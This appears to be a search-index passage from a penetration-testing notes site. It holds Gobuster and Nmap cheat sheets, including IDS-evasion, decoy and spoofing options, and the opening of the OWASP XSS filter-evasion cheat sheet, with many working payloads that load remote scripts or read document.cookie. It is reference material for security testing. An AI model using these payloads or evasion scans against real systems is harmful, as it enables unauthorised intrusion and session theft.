", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/", "title": "Gobuster CheatSheet", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#common-gobuster-commands", "title": "Common Gobuster Commands", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dir-mode", "title": "dir Mode", "text": "gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt\n
With content length
gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt -l\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dns-mode", "title": "dns Mode", "text": "gobuster dns -d example.com -t 50 -w common-names.txt\n
gobuster dns -d example.com-w ~/wordlists/subdomains.txt\n
With Show IP
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i\n
Base domain validation warning when the base domain fails to resolve
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i\n
Wildcard DNS is also detected properly:
gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#vhost-mode", "title": "vhost Mode", "text": "gobuster vhost -u https://example.com -w common-vhosts.txt\n
s3 Mode
gobuster s3 -w bucket-names.txt\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#available-modes", "title": "Available Modes", "text": "Switch Description dir the classic directory brute-forcing mode dns DNS subdomain brute-forcing mode s3 Enumerate open S3 buckets and look for existence and bucket listings vhost irtual host brute-forcing mode (not the same as DNS!)", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#global-flags", "title": "Global Flags", "text": "Short Switch Long Switch Description -z --no-progress Don't display progress -o --output string Output file to write results to (defaults to stdout) -q --quiet Don't print the banner and other noise -t --threads int Number of concurrent threads (default 10) -i --show-ips Show IP addresses --delay duration DNS resolver timeout (default 1s) -v, --verbose Verbose output (errors) -w --wordlist string Path to the wordlist", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dns-mode-options", "title": "DNS Mode Options", "text": "Short Switch Long Switch Description -h, --help help for dns -d, --domain string The target domain -r, --resolver string Use custom DNS server (format server.com or server.com:port) -c, --show-cname Show CNAME records (cannot be used with '-i' option) -i, --show-ips Show IP addresses --timeout duration DNS resolver timeout (default 1s)", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dir-mode-options", "title": "DIR Mode Options", "text": "Short Switch Long Switch Description -h, --help help for dir -f, --add-slash Append / to each request -c, --cookies string Cookies to use for the requests -e, --expanded Expanded mode, print full URLs -x, --extensions string File extension(s) to search for -r, --follow-redirect Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -l, --include-length Include the length of the body in the output -k, --no-tls-validation Skip TLS certificate verification -n, --no-status Don't print status codes -P, --password string Password for Basic Auth -p, --proxy string Proxy to use for requests [http(s)://host:port] -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) (default \"200,204,301,302,307,401,403\") -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default \"gobuster/3.1.0\") -U, --username string Username for Basic Auth -d, --discover-backup Upon finding a file search for backup files --wildcard Force continued operation when wildcard found", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#vhost-mode-options", "title": "vhost Mode Options", "text": "Short Switch Long Switch Description -h --help help for vhost -c --cookies string Cookies to use for the requests -r --follow-redirect Follow redirects -H --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -k --no-tls-validation Skip TLS certificate verification -P --password string Password for Basic Auth -p --proxy string Proxy to use for requests [http(s)://host:port] --timeout duration HTTP Timeout (default 10s) -u --url string The target URL -a --useragent string Set the User-Agent string (default \"gobuster/3.1.0\") -U --username string Username for Basic Auth", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/", "title": "Nmap CheatSheet", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#common-nmap-commands", "title": "Common Nmap Commands", "text": "Aggressive scan, single host, TCP SYN, :
nmap -n -sS -p- -T4 -Pn -A -v 192.168.1.1\n
Ping Scan - Host discovery in subnet
nmap -sn -v 192.168.0.0/24\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#target-specification", "title": "Target Specification", "text": "Switch Description Example nmap 192.168.1.1 Scan a single IP nmap 192.168.1.1 192.168.2.1 Scan specific IPs nmap scanme.nmap.org Scan a range nmap scanme.nmap.org Scan a domain nmap 192.168.1.0/24 Scan using CIDR notation -iL nmap -iL targets.txt Scan targets from a file -iR nmap -iR 100 Scan 100 random hosts --exclude nmap --exclude 192.168.1.1 Exclude listed hosts", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#scan-techniques", "title": "Scan Techniques", "text": "Switch Example Description -sS nmap 192.168.1.1 -sS TCP SYN port scan (Default) -sT nmap 192.168.1.1 -sT TCP connect port scan (Default without root privilege) -sU nmap 192.168.1.1 -sU UDP port scan -sA nmap 192.168.1.1 -sA TCP ACK port scan -sW nmap 192.168.1.1 -sW TCP Window port scan -sM nmap 192.168.1.1 -sM TCP Maimon port scan", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#host-discovery", "title": "Host Discovery", "text": "Switch Description Example -sL nmap 192.168.1.1-3 -sL No Scan. List targets only -sn nmap 192.168.1.1/24 -sn Disable port scanning. Host discovery only. -Pn nmap 192.168.1.1-5 -Pn Disable host discovery. Port scan only. -PS nmap 192.168.1.1-5 -PS22-25,80 TCP SYN discovery on port x.Port 80 by default -PA nmap 192.168.1.1-5 -PA22-25,80 TCP ACK discovery on port x.Port 80 by default -PU nmap 192.168.1.1-5 -PU53 UDP discovery on port x.Port 40125 by default -PR nmap 192.168.1.1-1/24 -PR ARP discovery on local network -n nmap 192.168.1.1 -n Never do DNS resolution", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#port-specification", "title": "Port Specification", "text": "Switch Description Example -p nmap 192.168.1.1 -p 21 Port scan for port x -p nmap 192.168.1.1 -p 21-100 Port range -p nmap 192.168.1.1 -p U:53,T:21-25,80 Port scan multiple TCP and UDP ports -p nmap 192.168.1.1 -p- Port scan all ports -p nmap 192.168.1.1 -p http,https Port scan from service name -F nmap 192.168.1.1 -F Fast port scan (100 ports) --top-ports nmap 192.168.1.1 --top-ports 2000 Port scan the top x ports -p-65535 nmap 192.168.1.1 -p-65535 Leaving off initial port in range makes the scan start at port 1 -p0- nmap 192.168.1.1 -p0- Leaving off end port in rangemakes the scan go through to port 65535", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#service-and-version-detection", "title": "Service and Version Detection", "text": "Switch Description Example -sV nmap 192.168.1.1 -sV Attempts to determine the version of the service running on port -sV --version-intensity nmap 192.168.1.1 -sV --version-intensity 8 Intensity level 0 to 9. Higher number increases possibility of correctness -sV --version-light nmap 192.168.1.1 -sV --version-light Enable light mode. Lower possibility of correctness. Faster -sV --version-all nmap 192.168.1.1 -sV --version-all Enable intensity level 9. Higher possibility of correctness. Slower -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#os-detection", "title": "OS Detection", "text": "Switch Description Example -O nmap 192.168.1.1 -O Remote OS detection using TCP/IP stack fingerprinting -O --osscan-limit nmap 192.168.1.1 -O --osscan-limit If at least one open and one closed TCP port are not found it will not try OS detection against host -O --osscan-guess nmap 192.168.1.1 -O --osscan-guess Makes Nmap guess more aggressively -O --max-os-tries nmap 192.168.1.1 -O --max-os-tries 1 Set the maximum number x of OS detection tries against a target -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#timing-and-performance", "title": "Timing and Performance", "text": "Switch Description Example -T0 nmap 192.168.1.1 -T0 Paranoid (0) Intrusion DetectionSystem evasion -T1 nmap 192.168.1.1 -T1 Sneaky (1) Intrusion Detection Systemevasion -T2 nmap 192.168.1.1 -T2 Polite (2) slows down the scan to useless bandwidth and use less target machine resources -T3 nmap 192.168.1.1 -T3 Normal (3) which is default speed -T4 nmap 192.168.1.1 -T4 Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network -T5 nmap 192.168.1.1 -T5 Insane (5) speeds scan; assumes you are on an extraordinarily fast network -------- -------- ------------------------------------------------------------------------------------------- --host-timeout 1s; 4m; 2h Give up on target after this long --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout 1s; 4m; 2h Specifies probe round trip time --min-hostgroup/max-hostgroup <size 50; 1024 Parallel host scan group sizes --min-parallelism/max-parallelism 10; 1 Probe parallelization --scan-delay/--max-scan-delay 20ms; 2s; 4m; 5h Adjust delay between probes --max-retries 3 Specify the maximum number of port scan probe retransmissions --min-rate 100 Send packets no slower than per second --max-rate 100 Send packets no faster than per second", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#nse-scripts", "title": "NSE Scripts", "text": "Switch Description Example -sC nmap 192.168.1.1 -sC Scan with default NSE scripts. Considered useful for discovery and safe --script default nmap 192.168.1.1 --script default Scan with default NSE scripts. Considered useful for discovery and safe --script nmap 192.168.1.1 --script=banner Scan with a single script. Example banner --script nmap 192.168.1.1 --script=http* Scan with a wildcard. Example http --script nmap 192.168.1.1 --script=http,banner Scan with two scripts. Example http and banner --script nmap 192.168.1.1 --script \"not intrusive\" Scan default, but remove intrusive scripts --script-args nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 NSE script with arguments", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#useful-nse-script-examples", "title": "Useful NSE Script Examples", "text": "Command Description nmap -Pn --script=http-sitemap-generator scanme.nmap.org http site map generator nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 Fast search for random web servers nmap -Pn --script=dns-brute domain.com Brute forces DNS hostnames guessing subdomains nmap -n -Pn -vv -O -sV --script smb-enum,smb-ls,smb-mbenum,smb-os-discovery,smb-s,smb-vuln,smbv2 -vv 192.168.1.1 Safe SMB scripts to run nmap --script whois* domain.com Whois query nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org Detect cross site scripting vulnerabilities nmap -p80 --script http-sql-injection scanme.nmap.org Check for SQL injections", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#firewall-ids-evasion-and-spoofing", "title": "Firewall / IDS Evasion and Spoofing", "text": "Switch Description Example -f nmap 192.168.1.1 -f Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters --mtu nmap 192.168.1.1 --mtu 32 Set your own offset size -D nmap -D 192.168.1.101,192.168.1.102, 192.168.1.103,192.168.1.23 192.168.1.1 Send scans from spoofed IPs -D nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip Above example explained -S nmap -S www.microsoft.com www.facebook.com Scan Facebook from Microsoft (-e eth0 -Pn may be required) -g nmap -g 53 192.168.1.1 Use given source port number --proxies nmap --proxies http://192.168.1.1:8080
, http://192.168.1.2:8080
192.168.1.1 Relay connections through HTTP/SOCKS4 proxies --data-length nmap --data-length 200 192.168.1.1 Appends random data to sent packets", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#example-ids-evasion-command", "title": "Example IDS Evasion command", "text": "nmap -f -t 0 -n -Pn \u2013data-length 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#output", "title": "Output", "text": "Switch Description Example -oN nmap 192.168.1.1 -oN normal.file Normal output to the file normal.file -oX nmap 192.168.1.1 -oX xml.file XML output to the file xml.file -oG nmap 192.168.1.1 -oG grep.file Grepable output to the file grep.file -oA nmap 192.168.1.1 -oA results Output in the three major formats at once -oG - nmap 192.168.1.1 -oG - Grepable output to screen. -oN -, -oX - also usable --append-output nmap 192.168.1.1 -oN file.file --append-output Append a scan to a previous scan file -v nmap 192.168.1.1 -v Increase the verbosity level (use -vv or more for greater effect) -d nmap 192.168.1.1 -d Increase debugging level (use -dd or more for greater effect) --reason nmap 192.168.1.1 --reason Display the reason a port is in a particular state, same output as -vv --open nmap 192.168.1.1 --open Only show open (or possibly open) ports --packet-trace nmap 192.168.1.1 -T4 --packet-trace Show all packets sent and received --iflist nmap --iflist Shows the host interfaces and routes --resume nmap --resume results.file Resume a scan", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#helpful-nmap-output-examples", "title": "Helpful Nmap Output examples", "text": "Scan for web servers and grep to show which IPs are running web servers
nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep open\n
Generate a list of the IPs of live hosts
nmap -iR 10 -n -oX out.xml | grep \"Nmap\" | cut -d \" \" -f5 > live-hosts.txt\n
Append IP to the list of live hosts
nmap -iR 10 -n -oX out2.xml | grep \"Nmap\" | cut -d \" \" -f5 >> live-hosts.txt\n
Compare output from nmap using the ndif
ndiff scanl.xml scan2.xml\n
Convert nmap xml files to html files
xsltproc nmap.xml -o nmap.html\n
Reverse sorted list of how often ports turn up
grep \" open \" results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#miscellaneous-options", "title": "Miscellaneous Options", "text": "Switch Description Example -6 nmap -6 2607:f0d0:1002:51::4 Enable IPv6 scanning -h nmap -h nmap help screen", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#other-useful-nmap-commands", "title": "Other Useful Nmap Commands", "text": "Discovery only on ports x, no port scan
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn\n
Arp discovery only on local network, no port scan
nmap 192.168.1.1-1/24 -PR -sn -vv\n
Traceroute to random targets, no port scan
nmap -iR 10 -sn -traceroute\n
Query the Internal DNS for hosts, list targets only
nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/", "title": "XSS CheatSheet", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#introduction", "title": "Introduction", "text": "This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS CheatSheet, which was at: http://ha.ckers.org/xss.html
. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention CheatSheet, the Cross Site Scripting Prevention CheatSheet, was inspired by RSnake's XSS CheatSheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack CheatSheet, and so the OWASP CheatSheet Series was born.
This CheatSheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#basic-xss-test-without-filter-evasion", "title": "Basic XSS Test Without Filter Evasion", "text": "This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xss-locator-polygot", "title": "XSS Locator (Polygot)", "text": "The following is a \"polygot test XSS payload.\" This test will execute in multiple contexts including html, script string, js and url. Thank you to Gareth Heyes for this contribution.
`javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#image-xss-using-the-javascript-directive", "title": "Image XSS Using the JavaScript Directive", "text": "Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:
<img src=\"javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#no-quotes-and-no-semicolon", "title": "No Quotes and no Semicolon", "text": "<IMG SRC=javascript:alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#case-insensitive-xss-attack-vector", "title": "Case Insensitive XSS Attack Vector", "text": "<IMG SRC=JaVaScRiPt:alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#html-entities", "title": "HTML Entities", "text": "The semicolons are required for this to work:
<img src='javascript:alert(\"XSS\")' />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#grave-accent-obfuscation", "title": "Grave Accent Obfuscation", "text": "If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#malformed-a-tags", "title": "Malformed A Tags", "text": "Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome
`\\<a onmouseover=\"alert(document.cookie)\"\\>xxs link\\</a\\>\n
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
`\\<a onmouseover=alert(document.cookie)\\>xxs link\\</a\\>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#malformed-img-tags", "title": "Malformed IMG Tags", "text": "Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:
<IMG \"\"\">\n<script>\nalert('XSS');\n</script>\n\"\\>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#fromcharcode", "title": "fromCharCode", "text": "If no quotes of any kind are allowed you can eval()
a fromCharCode
in JavaScript to create any XSS vector you need:
<img src=\"javascript:alert(String.fromCharCode(88,83,83))\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#default-src-tag-to-get-past-filters-that-check-src-domain", "title": "Default SRC Tag to Get Past Filters that Check SRC Domain", "text": "This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur
, onclick
giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .
<img src=\"#\" onmouseover=\"alert('xxs')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#default-src-tag-by-leaving-it-empty", "title": "Default SRC Tag by Leaving it Empty", "text": "<img src=\"onmouseover\" =\"alert('xxs')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#default-src-tag-by-leaving-it-out-entirely", "title": "Default SRC Tag by Leaving it out Entirely", "text": "<img onmouseover=\"alert('xxs')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#on-error-alert", "title": "On Error Alert", "text": "<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-onerror-and-javascript-alert-encode", "title": "IMG onerror and JavaScript Alert Encode", "text": "<img src=x onerror=\"javascript:alert('XSS')\">\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#decimal-html-character-references", "title": "Decimal HTML Character References", "text": "All of the XSS examples that use a javascript: directive inside of an <IMG
tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).
<img\n src=\"javascript:alert('XSS')\"\n/>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#decimal-html-character-references-without-trailing-semicolons", "title": "Decimal HTML Character References Without Trailing Semicolons", "text": "This is often effective in XSS that attempts to look for \"&#XX;\", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like \\(tmp_string =\\~ s/.\\*\\\\&\\#(\\\\d+);.\\*/\\)1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):
<img\n src=\"javascript:alert('XSS')\"\n/>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#hexadecimal-html-character-references-without-trailing-semicolons", "title": "Hexadecimal HTML Character References Without Trailing Semicolons", "text": "This is also a viable XSS attack against the above string \\(tmp_string=\\~ s/.\\*\\\\&\\#(\\\\d+);.\\*/\\)1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).
<img\n src=\"javascript:alert('XSS')\"\n/>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-tab", "title": "Embedded Tab", "text": "Used to break up the cross site scripting attack:
<img src=\"jav ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-encoded-tab", "title": "Embedded Encoded Tab", "text": "Use this one to break up XSS :
<img src=\"jav	ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-newline-to-break-up-xss", "title": "Embedded Newline to Break-up XSS", "text": "Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:
<img src=\"jav
ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-carriage-return-to-break-up-xss", "title": "Embedded Carriage Return to Break-up XSS", "text": "(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
<img src=\"jav
ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#null-breaks-up-javascript-directive", "title": "Null breaks up JavaScript Directive", "text": "Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00
in the URL string or if you want to write your own injection tool you can either use vim (^V^@
will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00
is much more useful and helped me bypass certain real world filters with a variation on this example:
`perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#spaces-and-meta-chars-before-the-javascript-in-images-for-xss", "title": "Spaces and Meta Chars Before the JavaScript in Images for XSS", "text": "This is useful if the pattern match doesn't take into account spaces in the word javascript:
-which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the javascript:
keyword. The actual reality is you can have any char from 1-32 in decimal:
<img src=\"  javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#non-alpha-non-digit-xss", "title": "Non-alpha-non-digit XSS", "text": "The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \\<SCRIPT\\\\s
!= \\<SCRIPT/XSS\\\\s
:
<SCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n
Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:
<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n
Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#extraneous-open-brackets", "title": "Extraneous Open Brackets", "text": "Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:
<\n<script>\nalert('XSS'); //\\<\n</script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#no-closing-script-tags", "title": "No Closing Script Tags", "text": "In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \\></SCRIPT>
portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:
<SCRIPT SRC=http://xss.rocks/xss.js?< B >\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#protocol-resolution-in-script-tags", "title": "Protocol Resolution in Script Tags", "text": "This particular variant was submitted by \u0141ukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT>
tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The \".j\" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
<SCRIPT SRC=//xss.rocks/.j>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#half-open-htmljavascript-xss-vector", "title": "Half Open HTML/JavaScript XSS Vector", "text": "Unlike Firefox the IE rendering engine doesn't add extra data to you page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close \">\" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\\\%3D)|(=))\\[^\\\\n\\]\\*((\\\\%3C)|\\<)\\[^\\\\n\\]+((\\\\%3E)|\\>)/
because it doesn't require the end \">\". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME
tag instead of an <IMG
tag:
<IMG SRC=\"`<javascript:alert>`('XSS')\"`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#double-open-angle-brackets", "title": "Double Open Angle Brackets", "text": "Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:
<iframe src=http://xss.rocks/scriptlet.html <`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#escaping-javascript-escapes", "title": "Escaping JavaScript Escapes", "text": "When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=\"$ENV{QUERY\\_STRING}\";</SCRIPT>
